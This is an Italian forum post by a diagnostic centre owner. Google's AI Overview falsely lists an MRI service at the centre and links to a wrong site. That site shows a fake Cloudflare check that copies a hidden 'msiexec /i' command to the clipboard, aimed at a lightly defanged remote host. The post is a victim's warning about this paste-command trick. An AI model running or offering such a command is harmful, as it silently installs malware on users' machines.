- Home
- Categorie
- Digital Marketing
- Intelligenza Artificiale
- Problema AI overview
-
Problema AI overview
Ciao a tutti,
voglio segnalare un fatto spiacevole che sta accadendo ad un mio sito, che appartiene ad una mia azienda.
Si tratta di un centro diagnostico a Viterbo che NON dispone di una risonanza magnetica. Da qualche giorno, telefonicamente, ci contattano per prenotare una risonanza magnetica... la città è piccola e la clientela bene o male sa che la RM non c'è, quindi risultava strana questa impennata di richieste, fino a quando non ci girano su whatsapp lo screenshot di una risposta di AI Overview si Google.
Non solo c'è scritto che abbiamo la risonanza magnetica, ma addirittura scende in dettagli sugli esami e suggerisce il nostro numero di telefono, ma il link ad un sito che non è il nostro, che è www.salusviterbo.it e non parla di risonanza magnetica!!La cosa più curiosa che aprendo più dettagli, indica anche il tipo di macchina, e tanti altri dettagli, fino a riproporre il nostro numero di telefono, l'indirizzo della nostra sede, ma di nuovo il sito web sbagliato.
La più grave avviene adesso. Per curiosità provo a visitare quel sito, anche per capire di chi fosse, e le prime visite vengono bloccate da un bizzarro controllo di integrità di Cloudflare, secondo me assolutamente malevolo, come da immagine:
Ovviamente non ho seguito quelle indicazioni, ma la curiosità di vedere cosa si nasconesse dietro quel CTRL + V era forte... e qui la sorpresa:
msiexec /i https://jobssearchexperts(dot)com /qn seguito da tanti spazi, così da vedere la riga di comando aperta da Win + R vuota. Ovviamente non ho premuto invio... il (dot) l'ho messo io, ma c'era il punto.
Provando ad aprire il sito in momenti diversi, alla fine è uscito un sito di un centro medico con lo stesso nome del mio, ma in un altra città (Civitavecchia) che ha esattamente quel tipo di risonanza magnetica.
Mi chiedo:
- Come fa Google a prendere una cantonata del genere ?
- Come posso segnalare la cosa perché vengono date informazioni palesemente sbagliate sulla mia azienda ?
- Come fa a suggerire e prendere per affidabile un sito che tenta di iniettare qalche schifo nella riga di comando ?